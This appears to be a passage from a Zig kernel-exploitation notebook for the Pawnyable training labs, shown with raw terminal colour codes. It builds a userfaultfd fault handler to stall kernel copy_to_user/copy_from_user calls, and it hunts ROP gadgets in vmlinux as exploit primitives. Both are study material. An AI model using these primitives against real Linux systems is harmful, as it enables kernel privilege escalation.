�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mt�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mThread�[0m�[1m�[37m.�[0m�[37mspawn�[0m�[1m�[37m(.{},�[0m�[1m�[37m �[0m�[1m�[37mfault_handler�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37mfd�[0m�[1m�[37m}�[0m�[1m�[37m �[0m�[1m�[36m++�[0m�[1m�[37m �[0m�[1m�[37mfh_args�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37mpinThreadToCore�[0m�[1m�[37m(�[0m�[1m�[37mt�[0m�[1m�[37m.�[0m�[37mgetHandle�[0m�[1m�[37m(),�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mt�[0m�[1m�[37m.�[0m�[37mdetach�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37mtestFaultHandler�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mufd�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37muserfaultfd�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mS�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mstruct�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mmsg�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mufd�[0m�[1m�[37m.�[0m�[1m�[37mmsg�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mfault_count�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu32�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mpage�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mmmap�[0m�[1m�[37m(�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36mnull�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m0x1000�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[1m�[37mPROT�[0m�[1m�[37m.�[0m�[1m�[37mREAD�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[1m�[37mPROT�[0m�[1m�[37m.�[0m�[1m�[37mWRITE�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mMAP�[0m�[1m�[37m{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mTYPE�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mPRIVATE�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mANONYMOUS�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mtrue�[0m�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m1�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[33mcatch�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37merr�[0m�[1m�[37m(�[0m�[33m"mmap failed"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mdefer�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mmunmap�[0m�[1m�[37m(�[0m�[1m�[37mpage�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37minfo�[0m�[1m�[37m(�[0m�[33m"Waiting for page fault..."�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mpollfds�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[37m_�[0m�[1m�[37m]�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mpollfd�[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mfd�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mevents�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mPOLL�[0m�[1m�[37m.�[0m�[1m�[37mIN�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mrevents�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mwhile�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[36mtrue�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mpoll�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mpollfds�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m1�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[33mcatch�[0m�[1m�[37m �[0m�[33mbreak�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mpollfd�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mpollfds�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m];�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37merr_mask�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mPOLL�[0m�[1m�[37m.�[0m�[1m�[37mERR�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mPOLL�[0m�[1m�[37m.�[0m�[1m�[37mHUP�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mif�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mpollfd�[0m�[1m�[37m.�[0m�[1m�[37mrevents�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37m �[0m�[1m�[37merr_mask�[0m�[1m�[37m �[0m�[1m�[36m!=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37merr�[0m�[1m�[37m(�[0m�[33m"poll failed"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mread�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37masBytes�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mS�[0m�[1m�[37m.�[0m�[1m�[37mmsg�[0m�[1m�[37m))�[0m�[1m�[37m �[0m�[33mcatch�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37merr�[0m�[1m�[37m(�[0m�[33m"read failed"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mpagefault_event�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mswitch�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mS�[0m�[1m�[37m.�[0m�[1m�[37mmsg�[0m�[1m�[37m.�[0m�[1m�[37mevent�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mPAGEFAULT�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[37mS�[0m�[1m�[37m.�[0m�[1m�[37mmsg�[0m�[1m�[37m.�[0m�[1m�[37marg�[0m�[1m�[37m.�[0m�[1m�[37mpagefault�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37merr�[0m�[1m�[37m(�[0m�[33m"Received non-pagefault event"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37minfo�[0m�[1m�[37m(�[0m�[33m"pagefault_event.flags = {any}"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37mpagefault_event�[0m�[1m�[37m.�[0m�[1m�[37mflags�[0m�[1m�[37m});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37minfo�[0m�[1m�[37m(�[0m�[33m"pagefault_event.addr = 0x{x}"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37mpagefault_event�[0m�[1m�[37m.�[0m�[1m�[37maddress�[0m�[1m�[37m});�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[37m@memcpy�[0m�[1m�[37m(�[0m�[1m�[37mpage�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[36m9�[0m�[1m�[37m],�[0m�[1m�[37m �[0m�[33mif�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mS�[0m�[1m�[37m.�[0m�[1m�[37mfault_count�[0m�[1m�[37m �[0m�[1m�[36m%�[0m�[1m�[37m �[0m�[1m�[36m2�[0m�[1m�[37m �[0m�[1m�[36m==�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[33m"Test (0)�[0m�[33m\x00�[0m�[33m"�[0m�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[33m"Test (1)�[0m�[33m\x00�[0m�[33m"�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mS�[0m�[1m�[37m.�[0m�[1m�[37mfault_count�[0m�[1m�[37m �[0m�[1m�[36m+=�[0m�[1m�[37m �[0m�[1m�[36m1�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mufcopy�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mufd�[0m�[1m�[37m.�[0m�[1m�[37muffdio_copy�[0m�[1m�[37m{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37msrc�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@intFromPtr�[0m�[1m�[37m(�[0m�[37m@as�[0m�[1m�[37m([�[0m�[1m�[36m*�[0m�[1m�[37m]�[0m�[1m�[36mu8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@ptrCast�[0m�[1m�[37m(�[0m�[1m�[37mpage�[0m�[1m�[37m))),�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mdst�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mpagefault_event�[0m�[1m�[37m.�[0m�[1m�[37maddress�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37m �[0m�[1m�[36m~�[0m�[37m@as�[0m�[1m�[37m(�[0m�[1m�[36mu64�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0xfff�[0m�[1m�[37m),�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mpage�[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mmode�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[0m...
�[1m�[37m �[0m�[33mswitch�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37merrno�[0m�[1m�[37m(�[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[37mioctl�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@intFromEnum�[0m�[1m�[37m(�[0m�[1m�[37mufd�[0m�[1m�[37m.�[0m�[1m�[37mUFFDIO�[0m�[1m�[37m.�[0m�[1m�[37mCOPY�[0m�[1m�[37m),�[0m�[1m�[37m �[0m�[37m@intFromPtr�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mufcopy�[0m�[1m�[37m))))�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mSUCCESS�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[37m{},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37merr�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37merr�[0m�[1m�[37m(�[0m�[33m"{any}"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37merr�[0m�[1m�[37m});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[36m<<�[0m�[1m�[37mpawnyable�[0m�[1m�[36m-�[0m�[1m�[37mlib�[0m�[1m�[36m>>�[0m�[1m�[37m�[0m
�[1m�[36m<<�[0m�[1m�[37mlk04�[0m�[1m�[36m-�[0m�[1m�[37muserfaultfd�[0m�[1m�[36m>>�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mpub�[0m�[1m�[37m �[0m�[33mfn�[0m�[1m�[37m �[0m�[37mmain�[0m�[1m�[37m()�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mcpu�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[1m�[37mcpu_set_t�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@splat�[0m�[1m�[37m(�[0m�[1m�[36m0�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mcpu�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m]�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m1�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[37msched_setaffinity�[0m�[1m�[37m(�[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[37mgetpid�[0m�[1m�[37m(),�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mcpu�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mpage�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mmmap�[0m�[1m�[37m(�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36mnull�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m0x2000�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[1m�[37mPROT�[0m�[1m�[37m.�[0m�[1m�[37mREAD�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[1m�[37mPROT�[0m�[1m�[37m.�[0m�[1m�[37mWRITE�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mMAP�[0m�[1m�[37m{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mTYPE�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mPRIVATE�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mANONYMOUS�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mtrue�[0m�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m1�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37muserfaultfd�[0m�[1m�[37m.�[0m�[37mregister�[0m�[1m�[37m(�[0m�[1m�[37mpage�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mtestFaultHandler�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{});�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m0x100�[0m�[1m�[37m]�[0m�[1m�[36mu8�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mfor�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[36m2�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37m_�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mbuf_as_cstring�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m*:�[0m�[1m�[36m0�[0m�[1m�[37m]�[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[36mu8�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@ptrCast�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mbuf�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[37m@memcpy�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mbuf�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mpage�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[36m0x100�[0m�[1m�[37m]);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mdebug�[0m�[1m�[37m.�[0m�[37mprint�[0m�[1m�[37m(�[0m�[33m"0x0000: {s}�[0m�[33m\n�[0m�[33m"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37mbuf_as_cstring�[0m�[1m�[37m});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[37m@memcpy�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mbuf�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mpage�[0m�[1m�[37m[�[0m�[1m�[36m0x1000�[0m�[1m�[37m..][�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[36m0x100�[0m�[1m�[37m]);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mdebug�[0m�[1m�[37m.�[0m�[37mprint�[0m�[1m�[37m(�[0m�[33m"0x1000: {s}�[0m�[33m\n�[0m�[33m"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37mbuf_as_cstring�[0m�[1m�[37m});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m[INFO] Waiting for page fault...�[0m
�[1m�[37m[INFO] pagefault_event.flags = tmp.DprYUckmLc.userfaultfd.msg__union_24586__struct_24587.FLAG{ .WRITE = false, .WP = false, .MINOR = false, ._ = 0 }�[0m
�[1m�[37m[INFO] pagefault_event.addr = 0x7f9577e2b000�[0m
�[1m�[37m0x0000: Test (0)�[0m
�[1m�[37m[INFO] pagefault_event.flags = tmp.DprYUckmLc.userfaultfd.msg__union_24586__struct_24587.FLAG{ .WRITE = false, .WP = false, .MINOR = false, ._ = 0 }�[0m
�[1m�[37m[INFO] pagefault_event.addr = 0x7f9577e2c000�[0m
�[1m�[37m0x1000: Test (1)�[0m
�[1m�[37m0x0000: Test (0)�[0m
�[1m�[37m0x1000: Test (1)�[0m
�[40m�[35m`copy_to_user`�[39m�[49m/�[40m�[35m`copy_from_user`�[39
m�[49mはまず�[40m�[35m`to`�[39m�[49m/�[40m�[35m`from`�[39m�[49mの引
数は参照を外すから、悪質なuserfaultfdのハンドラーは記憶をコーピする前に実行する。
ROPchain
�[1m�[37mgrep /proc/kallsyms -e �[0m�[33m'swapgs_restore_regs_and_return_to_usermode'�[0m�[1m�[37m�[0m
�[1m�[37mffffffff81800e10 T swapgs_restore_regs_and_return_to_usermode�[0m
�[1m�[37mropr --nosys --nojop -R �[0m�[33m'^(mov \[rax\], rdi|pop rax|pop rdi); ret;|^pop rsp; ret[^;]*?;'�[0m�[1m�[37m vmlinux�[0m
�[1m�[37m0xffffffff8110850a: mov [rax], rdi; ret;�[0m
�[1m�[37m0xffffffff811be9f4: pop rsp; ret 0x48b0;�[0m
�[1m�[37m0xffffffff8126db98: pop rsp; ret 0xdc;�[0m
�[1m�[37m0xffffffff813e525d: pop rsp; ret 0x7404;�[0m
�[1m�[37m0xffffffff813e53bb: pop rsp; ret 0xf04;�[0m
�[1m�[37m0xffffffff814a5527: pop rsp; ret 0x4d38;�[0m
�[1m�[37m0xffffffff81c9cd9d: pop rsp; ret 0x4fff;�[0m
�[1m�[37m0xffffffff81c9cda1: pop rsp; ret 0xefff;�[0m
�[1m�[37m0xffffffff81ca6ca0: pop rax; ret;�[0m
�[1m�[37m0xffffffff81ce088b: pop rdi; ret;�[0m
�[1m�[37m0xffffffff81d8cf00: pop rsp; ret 1;�[0m
�[1m�[37m0xffffffff81d962a4: pop rsp; ret;�[0m
�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mPUSH_RDX_CMP_EAX_0x415b005c_POP_RSP_POP_RBP�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xffffffff8109b13a�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mMOV_ADDROF_RAX_RDI�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xffffffff8110850a�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
